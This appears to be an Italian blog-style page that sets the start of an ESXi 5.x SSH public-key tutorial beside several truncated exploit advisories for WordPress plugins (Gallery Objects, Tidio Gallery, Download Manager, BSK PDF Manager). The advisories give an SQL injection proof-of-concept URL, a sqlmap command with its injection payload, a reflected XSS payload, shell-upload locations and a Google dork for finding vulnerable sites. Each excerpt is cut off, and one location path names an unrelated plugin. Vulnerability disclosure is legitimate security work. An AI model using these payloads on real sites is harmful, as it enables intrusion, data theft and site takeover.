Per abilitare l’autenticazione ssh tramite chiave pubblica sul virtualizzatore VMware ESXi 5.x basta creare un nuovo file all’interno dell’hypervisor.
Prendiamo come esempio la seguente chiave pubblica dell’utente root :
_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfJAIbuQj+T0xD1uA3B1yOqsPCfORhRNLzkrA5OqW1HC2ZTdvgTj/UgP1KJ6UBC3Ux0DRIoEHwoPonG4XdwrSvQVaMYLG4G+kAHwZN5A3IL7D4aNGJPtMPmxfeVdsJHGCO2xIcpPmk/FpcJJW2IF3BlYqJr8sqbo6/odp0kNK83ROuek0Lbaqhs/NE1rxfKbYouko9Rg/DBnKIIIITxWYZuYYqa+uXPzprpb8n6YX5+EkiuTo9to0dyA/M5kYcRrbrv1aYjU2HsmQJiDz+x4KHvHIrAjcf0t9Fu5yLuV0KuiTnzdYL+FojkVNyW/hXNaT4fWI2iKYEaCc7vedqAPiZ root@backbox3_ SSH Public key su ESXi 5.x —> Test Connessione senza chiave Proviamo a stabilire una connessione ssh da una distribuzione linux verso il virtualizzatore ESXi 5.x (10.0.0.3)
root@backbox3:~# ssh 10.0.0.3 The authenticity of host '10.0.0.3 (10.0.0.3)' can't be established....
######################
# Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://galleryobjects.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
# Dork Google: inurl:/admin-ajax.php?action=go_view_object # Date : 2014-07-18
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
Poc via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
Discovered By : Claudio Viviani
http://www....
######################
# Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.tidioelements.com/
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
# Date : 2014-07-14
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
######################
# Vulnerablity n°1:
XSS Reflected Unauthenticated
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
# Vulnerablity n°2:
Unprivileged user like subscriber could upload shell script....
######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : www.wpdownloadmanager.com
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
# Date : 2014-07-11
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
# # # WORK ONLY ON SERVER WITH .HTACCESS FILES DISABLED
######################
# Location : http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
######################
# Description :
WordPress Download Manager 2....
######################
# Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard....